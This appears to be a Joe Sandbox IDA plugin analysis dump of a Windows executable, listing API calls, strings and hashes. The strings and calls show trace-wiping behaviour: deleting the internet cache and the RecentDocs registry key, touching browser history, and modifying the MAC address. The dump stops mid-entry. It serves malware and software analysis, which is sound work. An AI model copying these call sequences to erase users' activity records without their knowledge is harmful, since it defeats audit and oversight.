                                • GetSystemMetrics.USER32(00000002), ref: 0045BEB8
                                • GetSystemMetrics.USER32(00000003), ref: 0045BEC2
                                • GetDC.USER32(00000000), ref: 0045BECC
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0045BEDD
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045BEE5
                                • ReleaseDC.USER32(00000000,00000000), ref: 0045BEED
                                Similarity
                                • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                • String ID:
                                • API String ID: 1031845853-0
                                APIs
                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 0042FA06
                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 0042FA99
                                • SendMessageA.USER32(?,00000151,00000000,?), ref: 0042FAB1
                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0042FAC9
                                  • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                  • Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                  • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                Strings
                                • Have no usable adapters, MAC Address can't Modify!, xrefs: 0042FAEE
                                • Error, xrefs: 0042FAE9
                                Similarity
                                • API ID: Message$Send$CallbackDispatcherItemUser
                                • String ID: Error$Have no usable adapters, MAC Address can't Modify!
                                • API String ID: 670485088-1610973038
                                APIs
                                • FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 00402A03
                                • FindNextUrlCacheEntryA.WININET(00000000,00000000,?), ref: 00402A1B
                                • GetLastError.KERNEL32 ref: 00402A29
                                • DeleteUrlCacheEntry.WININET(?), ref: 00402A96
                                • FindCloseUrlCache.WININET(00000000), ref: 00402B14
                                Strings
                                • There is an error (%d) when trying deleting temporary internet files., xrefs: 00402ACA
                                Similarity
                                • API ID: Cache$EntryFind$CloseDeleteErrorFirstLastNext
                                • String ID: There is an error (%d) when trying deleting temporary internet files.
                                • API String ID: 2077925056-841692006
                                APIs
                                • GetParent.USER32(?), ref: 0045726D
                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00457294
                                • UpdateWindow.USER32(?), ref: 004572AE
                                • SendMessageA.USER32(?,00000121,00000000,?), ref: 004572D2
                                • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 004572EC
                                • UpdateWindow.USER32(?), ref: 00457332
                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00457366
                                  • Part of subcall function 0045982D: GetWindowLongA.USER32(?,000000F0), ref: 00459838
                                Similarity
                                • API ID: Message$Window$PeekSendUpdate$LongParent
                                • String ID:
                                • API String ID: 2853195852-0
                                APIs
                                • GetClientRect.USER32(?,?), ref: 0043C733
                                • PtInRect.USER32(?,?,?), ref: 0043C740
                                • SendMessageA.USER32(?,000002A3,?,?), ref: 0043C757
                                • _TrackMouseEvent.COMCTL32 ref: 0043C787
                                • CallWindowProcA.USER32(?,?,?,?,?), ref: 0043C803
                                Similarity
                                • API ID: Rect$CallClientEventMessageMouseProcSendTrackWindow
                                • String ID: (sM
                                • API String ID: 1649741670-3311458642
                                APIs
                                • SetErrorMode.KERNEL32(00000000,00000000,0045C864,?,?,?,?,76F90A60,00000000,?,00448293,00000000), ref: 004610E8
                                • SetErrorMode.KERNEL32(00000000,?,00448293,00000000), ref: 004610F0
                                • GetModuleHandleA.KERNEL32(user32.dll,00448293,00000000), ref: 0046113B
                                • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0046114B
                                  • Part of subcall function 00460F91: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 00460FD2
                                  • Part of subcall function 00460F91: PathFindExtensionA.SHLWAPI(?), ref: 00460FEC
                                  • Part of subcall function 00460F91: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00461086
                                  • Part of subcall function 00460F91: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004610B3
                                Similarity
                                • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                • String ID: NotifyWinEvent$user32.dll
                                • API String ID: 4004864024-597752486
                                APIs
                                  • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438E58
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438E73
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438E8E
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438EA9
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438EC4
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00438EDF
                                  • Part of subcall function 00436B70: RegOpenKeyExA.KERNEL32 ref: 00436BD0
                                  • Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1
                                Similarity
                                • API ID: MessageSend$H_prologItemOpen
                                • String ID:
                                • API String ID: 2983078765-0
                                APIs
                                • CoCreateInstance.OLE32 ref: 00405710
                                • IUnknown_Release_Proxy.RPCRT4(?), ref: 0040572B
                                • GetWindowsDirectoryA.KERNEL32(00000001,00000104), ref: 00405739
                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000022,00000000), ref: 00405780
                                Similarity
                                • API ID: CreateDirectoryFolderInstancePathProxyRelease_SpecialUnknown_Windows
                                • String ID: \History
                                • API String ID: 3119684454-314617673
                                APIs
                                  • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                  • Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                • CoInitializeEx.COMBASE ref: 0042BAFA
                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0042BB26
                                  • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                Strings
                                • Security initialization failed, xrefs: 0042BB36
                                • COM initialization failed, xrefs: 0042BB08
                                Similarity
                                • API ID: Initialize$CallbackDispatcherItemMessageSecurityUser
                                • String ID: COM initialization failed$Security initialization failed
                                • API String ID: 2763255498-2019830807
                                • Opcode ID: 0e0c895b859989d438ab38e8a594c5872f6e606db4c1caacad3cf4da41e47cf0
                                • Instruction ID: f88cc46181f4dfbc0f249d786d5360bfa143289b16b194d71d3c30d2b60c04a5
                                • Opcode Fuzzy Hash: 0e0c895b859989d438ab38e8a594c5872f6e606db4c1caacad3cf4da41e47cf0
                                • Instruction Fuzzy Hash: A001AD303D8B107AFA623632BD27F5C11856B50F26F60002FF606AE2D2DFDC6945828E
                                APIs
                                • FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 00401237
                                • FindFirstUrlCacheEntryA.WININET(00000000,00000000,?), ref: 0040124F
                                • DeleteUrlCacheEntry.WININET(?), ref: 00401287
                                • FindNextUrlCacheEntryA.WININET ref: 0040129D
                                • FindNextUrlCacheEntryA.WININET(00000000,00000000,?), ref: 004012BB
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CacheEntry$Find$FirstNext$Delete
                                • String ID:
                                • API String ID: 3251259003-0
                                • Opcode ID: 89f70f0e96486f4d92bd3eeb09e83cf657234353214fdc9808606fbe77fdbd33
                                • Instruction ID: 988728bd11fdbca91c0b550d98239d6b5543920a559e34b5b42614616c157492
                                • Opcode Fuzzy Hash: 89f70f0e96486f4d92bd3eeb09e83cf657234353214fdc9808606fbe77fdbd33
                                • Instruction Fuzzy Hash: 3A11C3B2505305AFD220EF959C84E6BB3DC9F98354F04482EF945A2291D778DC088BAA
                                APIs
                                • GetVolumeInformationA.KERNEL32(?,?,00000018,?,?,?), ref: 0042CE96
                                  • Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: H_prologInformationVolume
                                • String ID: %04X-%04X$C:\$disk error!
                                • API String ID: 1258155637-399326531
                                • Opcode ID: 6e15fd504c8c54dca98ca61168ccc2a65f08a8b0f6c50412227ce20cc2e1a098
                                • Instruction ID: cae5146e5efa9b00dd1fefc34af0bd2d153fb86159491f6109f916f967ad882e
                                • Opcode Fuzzy Hash: 6e15fd504c8c54dca98ca61168ccc2a65f08a8b0f6c50412227ce20cc2e1a098
                                • Instruction Fuzzy Hash: 8B31AD71204741AFC304DB68C845F5FBBA4AB85714F408A1EF1A6872D1DBB89509CB9A
                                APIs
                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0045FBB1
                                • PathFindExtensionA.SHLWAPI(?), ref: 0045FBC8
                                • lstrcpyA.KERNEL32(00000000,?), ref: 0045FBF2
                                  • Part of subcall function 0045F8A9: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0045F8CC
                                  • Part of subcall function 0045F8A9: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0045F8D7
                                  • Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(?), ref: 0045F908
                                  • Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(?), ref: 0045F910
                                  • Part of subcall function 0045F8A9: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0045F91D
                                  • Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(?), ref: 0045F937
                                  • Part of subcall function 0045F8A9: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0045F93D
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                • String ID: %s.dll
                                • API String ID: 4178508759-3668843792
                                • Opcode ID: 3e24a30a05569ae7f589b37ec69413717422cff000f7d417d5ba677a669868ee
                                • Instruction ID: cc2ed34eadf9b4ba29d8b30092525c1cfbb258b8e0cff2dfd049ffe264f0ed61
                                • Opcode Fuzzy Hash: 3e24a30a05569ae7f589b37ec69413717422cff000f7d417d5ba677a669868ee
                                • Instruction Fuzzy Hash: D60188B1D0010CABCB15EFA5DC959EE77BDFB48305F0405BAEE06D3101E6B49A4D8B55
                                APIs
                                • IsWindow.USER32(00030426), ref: 0043CC46
                                • LoadCursorA.USER32(00000000,00007F00), ref: 0043CC76
                                  • Part of subcall function 00456E8B: GetClassInfoA.USER32(?,-0000007C,?), ref: 00456EEA
                                • SetWindowLongA.USER32(00030426,000000FC,0043C820), ref: 0043CCA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Window$ClassCursorInfoLoadLong
                                • String ID: (sM
                                • API String ID: 2858387636-3311458642
                                • Opcode ID: a7090532f8098ed2090d6412a7391523968236a1261bc1cd6769e82e2ec294ec
                                • Instruction ID: ef079a07a27ee7e5d70a19a55713efbde82861f97534fe9ab6d3067533c054b6
                                • Opcode Fuzzy Hash: a7090532f8098ed2090d6412a7391523968236a1261bc1cd6769e82e2ec294ec
                                • Instruction Fuzzy Hash: C3F05E70389310BBE31467A0AC5AF1A22199B44B45F20513FFF06BA2E5EAA86800C79D
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,004D5904,00000000,00000001,?), ref: 0045FAC8
                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 0045FAE8
                                • RegCloseKey.ADVAPI32(?), ref: 0045FB2C
                                • RegCloseKey.ADVAPI32(00000000), ref: 0045FB42
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Close$OpenQueryValue
                                • String ID:
                                • API String ID: 1607946009-0
                                • Opcode ID: 91043f04f9318fac727f71e0db06273f86fabba98528094b445e4c7aa36c70e2
                                • Instruction ID: ef4cf7c31f733ac53fc8ca2d79e85ee5050cdb63d3cced5bf84dc23dad16bdee
                                • Opcode Fuzzy Hash: 91043f04f9318fac727f71e0db06273f86fabba98528094b445e4c7aa36c70e2
                                • Instruction Fuzzy Hash: A8216DB1D00208EFDB21CF85D855AAEFBB8EF90315F1040BBE905A6211D3746A08CF66
                                APIs
                                • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00455C9F
                                • LoadResource.KERNEL32(?,00000000), ref: 00455CA7
                                • LockResource.KERNEL32(00000000), ref: 00455CB9
                                • FreeResource.KERNEL32(00000000), ref: 00455D03
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Resource$FindFreeLoadLock
                                • String ID:
                                • API String ID: 1078018258-0
                                • Opcode ID: 6af024dde24d29818a3f4c707ec0df0eb2a57cca12f1b9fef02d98814a47c105
                                • Instruction ID: a5e2a00811957388d8ef0ec10edfa5231714503df0fa2ad57628587c981f475f
                                • Opcode Fuzzy Hash: 6af024dde24d29818a3f4c707ec0df0eb2a57cca12f1b9fef02d98814a47c105
                                • Instruction Fuzzy Hash: 7B11913A500F05EFC7219F64D958AABB7B4FF04756F00802AEC4253751E3B8AC48DB54
                                APIs
                                • lstrlenA.KERNEL32(?), ref: 0045D96B
                                • GetWindowTextA.USER32(?,?,00000100), ref: 0045D987
                                • lstrcmpA.KERNEL32(?,?), ref: 0045D99B
                                • SetWindowTextA.USER32(?,?), ref: 0045D9AB
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: TextWindow$lstrcmplstrlen
                                • String ID:
                                • API String ID: 330964273-0
                                • Opcode ID: 723314ce92d9a9a6c7fa22a0811cb053bfc38c175d037d9aceb4dfb7d1b4b655
                                • Instruction ID: bcf724bac57874a173b33d79688deb67c16571129e900e4812eadd9e8c43e4f8
                                • Opcode Fuzzy Hash: 723314ce92d9a9a6c7fa22a0811cb053bfc38c175d037d9aceb4dfb7d1b4b655
                                • Instruction Fuzzy Hash: DAF01DB5901118ABDF21AF64DD489CE7B79EF08355F0040A2FD45E6220E774CA94DB9A
                                APIs
                                • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 0043CE22
                                • CreateFontIndirectA.GDI32(?), ref: 0043CE38
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CreateFontIndirectInfoParametersSystem
                                • String ID: xsM
                                • API String ID: 3898911155-2849830882
                                • Opcode ID: 294213541f4df0dd98909d1590b6c0f9666c8c3f3db484b2e6d3c5be98dcea8c
                                • Instruction ID: f5a41c1656a517e53d87a5575b5162294697ca63d823790e3c27869578f867cc
                                • Opcode Fuzzy Hash: 294213541f4df0dd98909d1590b6c0f9666c8c3f3db484b2e6d3c5be98dcea8c
                                • Instruction Fuzzy Hash: 9E215C71504780DFD325DF29D8057DABBE8FF88714F008A2FE48A87251DBB89404CB56
                                APIs
                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000008,00000008,00000000), ref: 00405650
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs), ref: 00405674
                                  • Part of subcall function 00405260: FindFirstFileA.KERNEL32(?,?,\*.*,00000004,?,?), ref: 0040530E
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs, xrefs: 0040566A
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: DeleteFileFindFirstFolderPathSpecial
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
                                • API String ID: 1374875820-3036595939
                                • Opcode ID: 3fba9971ef62013d3833a1864c1ae7c2acc93c511651f1d626164a0a82a318e4
                                • Instruction ID: 659d51f54426914620f0ef7ac8131a6f5e17d26cd5e287e3669eafa29438ce9a
                                • Opcode Fuzzy Hash: 3fba9971ef62013d3833a1864c1ae7c2acc93c511651f1d626164a0a82a318e4
                                • Instruction Fuzzy Hash: 2FF03035244700AEE324A7109C06FEA7794AB54B10F44442DF985AA2C0EEF99484CB9B
                                APIs
                                • lstrlenA.KERNEL32(0000B042), ref: 0045B1C6
                                  • Part of subcall function 0045B051: __EH_prolog.LIBCMT ref: 0045B056
                                  • Part of subcall function 0045B051: GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 0045B080
                                  • Part of subcall function 0045B051: lstrcpynA.KERNEL32(?,?,00000104), ref: 0045B091
                                • CreateFileA.KERNEL32(0000B042,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,0000B042), ref: 0045B2DB
                                • GetLastError.KERNEL32 ref: 0045B2ED
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CreateErrorFileFullH_prologLastNamePathlstrcpynlstrlen
                                • String ID:
                                • API String ID: 4207171074-0
                                • Opcode ID: a0ef4ab30a8c7bca15473b07d41fa31512ae2c4fa2b7c4a775cc0c152ee1711f
                                • Instruction ID: bc931f4a3eb57f992eb954223cc438830c3bf033075d61ebac5b1b5f474afd53
                                • Opcode Fuzzy Hash: a0ef4ab30a8c7bca15473b07d41fa31512ae2c4fa2b7c4a775cc0c152ee1711f
                                • Instruction Fuzzy Hash: F0413331600608ABEB108F25CC8A7EEB764EB04315F10C56BFD16D62D1CB7CC9898BA8
                                APIs
                                • FindResourceA.KERNEL32(00000000,?,00000006), ref: 004021CA
                                  • Part of subcall function 00401180: LoadResource.KERNEL32(00000104,?,?,00000000,0040120C,?,00000000,?,?,00000006,00000000,?,0045A3DC,?,?,?), ref: 0040118C
                                • WideCharToMultiByte.KERNEL32(00000000,?,0000007A,?,80070057), ref: 00402207
                                • WideCharToMultiByte.KERNEL32(00000000,?,0000007A,?,80070057), ref: 00402245
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ByteCharMultiResourceWide$FindLoad
                                • String ID:
                                • API String ID: 861045882-0
                                • Opcode ID: baa4575744bcffb4867a31880af86c8239e7816c7f4c7781bfc20bb34485b732
                                • Instruction ID: 4a0254a43c1e3588e48c1e462ee64abe08c7cd62e9e1b92a79ad5815ace06fc1
                                • Opcode Fuzzy Hash: baa4575744bcffb4867a31880af86c8239e7816c7f4c7781bfc20bb34485b732
                                • Instruction Fuzzy Hash: 9B21D4323016106FD7109B69DC8DF2B77ACEB49B55F10406EF541EB2D0DAB8A801C7A5
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(00000030,00000000,00000000,00000000), ref: 0045B600
                                • TranslateMessage.USER32(00000030), ref: 0045B61F
                                • DispatchMessageA.USER32(00000030), ref: 0045B626
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
